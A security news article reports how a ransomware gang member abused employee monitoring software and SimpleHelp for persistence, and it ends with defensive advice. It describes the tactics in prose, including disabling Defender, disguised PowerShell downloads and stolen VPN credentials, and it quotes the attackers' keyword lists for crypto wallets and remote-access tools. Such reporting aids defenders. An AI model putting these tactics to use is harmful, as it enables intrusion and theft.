Ransomware gang exploits employee monitoring software in corporate attacks

A member of the Crazy ransomware gang is exploiting legitimate employee monitoring software and remote support tools to infiltrate corporate networks, evade detection, and establish persistent access before deploying ransomware.

What happened

Security researchers investigated multiple intrusions where threat actors deployed Net Monitor for Employees Professional and SimpleHelp remote support tools to breach corporate networks. In one attack, the hackers installed Net Monitor for Employees Professional using Windows Installer utility, deploying the monitoring agent directly from the developer's site onto compromised systems. This gave attackers the ability to remotely view victims' desktops, transfer files, and execute commands. For redundant access, attackers downloaded SimpleHelp remote access client via PowerShell commands, disguising it with filenames similar to legitimate Visual Studio. The attackers attempted to enable local administrator accounts and disabled Windows Defender by stopping and deleting associated services. Both breaches were enabled through compromised SSL VPN credentials.

The backstory

The abuse of SimpleHelp for ransomware attacks is not an isolated incident. In 2025 the DragonForce ransomware operation breached a managed service provider and used its SimpleHelp remote monitoring and management platform to steal data and deploy encryptors on downstream customers' systems. The DragonForce attackers used SimpleHelp to perform reconnaissance on customer systems, collecting information about the MSP's customers, including device names, configuration, users, and network connections before attempting to steal data and deploy encryptors.

Going deeper

The attackers configured monitoring rules in SimpleHelp to track specific activities:

• Cryptocurrency monitoring: The agent continuously monitored for wallet services, exchanges, blockchain explorers, and payment platform payoneer
• Remote access detection: Monitored for RDP, anydesk, ultraview, teamview, and VNC keywords to detect if anyone was actively connecting to machines
• Dual persistence: Multiple remote access tools provided redundancy, ensuring attackers retained access even if one tool was discovered or removed
  
  

What was said

According to security researchers, "The logs show the agent continuously cycling through trigger and reset events for cryptocurrency-related keywords, including wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer."

The researchers further explained that "Alongside these, the agent also monitored for remote access tool keywords, including RDP, anydesk, ultraview, teamview, and VNC, likely to detect if anyone was actively connecting to the machine."

In the know

Employee monitoring software is designed for legitimate business purposes, allowing employers to track productivity, view employee screens, and manage remote workers. These tools include features like screen recording, keystroke logging, and file transfer capabilities. SimpleHelp is a legitimate remote support tool used by IT departments for troubleshooting and system maintenance. When threat actors abuse these tools, they blend in with normal administrative activity, making detection difficult. The use of legitimate software in cyberattacks is a tactic known as "living off the land," where attackers leverage existing, trusted tools rather than custom malware that might trigger security alerts.

Why it matters

This attack shows a pattern where ransomware gangs systematically exploit the same legitimate remote management tools trusted by healthcare organizations and MSPs. For healthcare organizations this is a problem because these monitoring tools are often used to manage medical devices, telehealth platforms, and electronic health records systems, giving attackers direct access to protected health information.

FAQs

Should organizations ban employee monitoring and remote access tools entirely?

No, but organizations should maintain strict approval processes and continuously monitor for unauthorized installations.

What specific logging should organizations enable to detect abuse of remote management tools?

Enable detailed audit logs for all remote access sessions, file transfers, command executions, and configuration changes, and integrate these logs into your SIEM for correlation analysis.

Are cloud-based remote access tools safer than on-premise solutions like SimpleHelp?

Cloud-based tools face similar abuse risks, but they may offer better visibility through centralized logging and vendor-managed security updates.